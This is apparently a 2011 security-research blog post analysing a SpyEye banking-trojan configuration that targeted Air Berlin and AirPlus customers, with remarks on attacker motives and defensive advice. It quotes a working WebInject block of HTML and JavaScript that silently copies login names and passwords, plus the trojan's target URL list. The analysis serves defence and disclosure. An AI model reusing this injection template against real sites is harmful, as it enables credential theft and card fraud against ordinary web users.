June 16, 2011 By Amit Klein 3 min read

IBM has uncovered a SpyEye configuration that targets users of two leading European airline travel websites: Air Berlin, the second-largest airline in Germany after Lufthansa, and AirPlus, the global provider of business travel services for companies. SpyEye exploits the user’s machine, not the websites, to carry out this fraud.

Travel Companies Become Trojan Targets

The two companies are far from randomly selected, but are, we believe, carefully chosen for their criminal revenue potential. One site accepts debit card payments, while the other caters to business users.

Air Berlin, now Europe’s sixth-largest airline, not only accepts debit and credit cards, but allows Austrian, Dutch and German citizens to pay by bank direct debit seven days before traveling. That means that criminals targeting an Air Berlin traveler from those countries stand a good chance of obtaining users’ personal details, including date of birth, which users must provide on the airline’s site, as well as their bank account details.

AirPlus, meanwhile, offers a variety of travel services for companies of all sizes on their website, all paid for by business payment cards, which are invariably linked to business bank accounts.

Since corporate accounts tend to carry much higher balances or credit limits than consumer accounts, they have much greater data-harvesting, and therefore revenue, potential for cybercriminals.

Data Harvesting Through HTML Injection

In the case of the Air Berlin attack, SpyEye attempts to harvest confidential user information, including username and password and other data that is entered on the targeted Web page. Since Air Berlin accepts bank debit card payments, the fraud potential is even more elevated.

SpyEye’s injection code captures the information on username and password details:

<WebInjects action="Inject|POST|GET"><Url><![CDATA[https://www.airberlin.com/site/yab/login/login*]]></Url><AuxUrl><![CDATA[]]></AuxUrl><WebInject><Before><![CDATA[<body>]]></Before><Data><![CDATA[<iframe name=ifr1 id=ifr1 src="https://www.airberlin.com/site/images/spacer.gif" width=0 height=0 border=none></iframe><form id=form7 name=form7 target=ifr1 method=post action="https://www.airberlin.com/site/images/spacer.gif"><input type="hidden" name="cc" id="cc" /><input type="hidden" name="pas" id="pas" /></form><script>function dosubmit(){document.form7.cc.value=document.getElementById('login').value;document.form7.pas.value=document.getElementById('pass').value;document.form7.submit();}</script>]]></Data><After><![CDATA[]]></After></WebInject><WebInject><Before><![CDATA[name="yabLogin" id="yabLogin"]]></Before><Data><![CDATA[ onclick="dosubmit()"]]></Data><After><![CDATA[]]></After></WebInject>

The AirPlus attack methodology, meanwhile, targets users of the Lufthansa Miles & More Visa credit card which offers bonus travel for purchases made using the card.

Similar to the Air Berlin attack, the SpyEye code targets the main login URL of the AirPlus portal:

<mark data-hasqtip="true" class="tempMark"><Url><![CDATA[https://portal.airplus.com/welcome*]]></Url> <Url><![CDATA[https://www.miles-and-more.kartenabrechnung.de/welcome*]]></Url></mark>

In this instance, SpyEye injects code that claims to be an anti-fraud enhancement into the user’s Web browser.

In reality, of course, this is a cleverly disguised attempt to phish user credentials from the unsuspecting customer of the AirPlus Web portal. Those credentials are quite comprehensive and include the card name and number, expiration date, CVV (signature strip) number and, as with the Air Berlin attack, the user’s date of birth.

The harvesting of the user’s date of birth opens up the possibility of identity theft and, we have observed, committing fraud by impersonating the user or using social engineering attack methods.

Conclusions

It is important to understand that cybercrime is now highly organized, with specialization of duties assigned to different members of the criminal hierarchy. That means that the darkware coding gangs behind the variants of SpyEye are now choosing their targets carefully for maximum revenue yield with minimal effort. In addition, by enhancing the fraudulent data yield from each victim, the possibilities for resale of data go way beyond that of the carder forums seen in the last few years.

We believe that the cybercriminal gang(s) behind the attacks are almost certainly using a semi-automated methodology of code development, allowing them to develop customized versions of the malware for specific purposes.

Clearly, the travel trade offers cybercriminals access to user and company account credentials with larger-than-normal account balances and credit card limits. Gaining access to Air Berlin bank account details in Austria, Germany and the Netherlands is an indication of targeting ingenuity.

Unfortunately, traditional antivirus security mechanisms are largely unable to protect corporate users from SpyEye infections because the malware uses targeted reconnaissance combined with signature-detection evasion techniques to get a foothold inside computers.

A better alternative for protecting Web-based services from becoming Trojan targets is to implement secure Web access. For example, browser-based tools that secure communication between the computer and cloud service provider website can prevent common attack methods like HTML injection and keylogging from grabbing data. Those same technologies can protect other browser-based applications, such as VPNs, CRM, retail, financial and collaboration systems that malware can exploit to steal user credentials and breach an enterprise’s security perimeter completely undetected.

We expect to see more specialized versions of SpyEye shortly.

More from Malware

Strela Stealer: Today’s invoice is tomorrow’s phish

12 min read - As of November 2024, IBM X-Force has tracked ongoing Hive0145 campaigns delivering Strela Stealer malware to victims throughout Europe - primarily Spain, Germany and Ukraine. The phishing emails used in these campaigns are real invoice notifications, which have been stolen through previously exfiltrated email credentials. Strela Stealer is designed to extract user credentials stored in Microsoft Outlook and Mozilla Thunderbird. During the past 18 months, the group tested various techniques to enhance its operation's effectiveness. Hive0145 is likely to be…

Hive0147 serving juicy Picanha with a side of Mekotio

17 min read - IBM X-Force tracks multiple threat actors operating within the flourishing Latin American (LATAM) threat landscape. X-Force has observed Hive0147 to be one of the most active threat groups operating in the region, targeting employee inboxes at scale, with a primary focus on phishing and malware distribution. After a 3-month break, Hive0147 returned in July with even larger campaign volumes, and the debut of a new malicious downloader X-Force named "Picanha,” likely under continued development, deploying the Mekotio banking trojan. Hive0147…

Ongoing ITG05 operations leverage evolving malware arsenal in global campaigns

13 min read - As of March 2024, X-Force is tracking multiple ongoing ITG05 phishing campaigns featuring lure documents crafted to imitate authentic documents of government and non-governmental organizations (NGOs) in Europe, the South Caucasus, Central Asia, and North and South America. The uncovered lures include a mixture of internal and publicly available documents, as well as possible actor-generated documents associated with finance, critical infrastructure, executive engagements, cyber security, maritime security, healthcare, business, and defense industrial production. Beginning in November 2023, X-Force observed ITG05…

Topic updates

Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today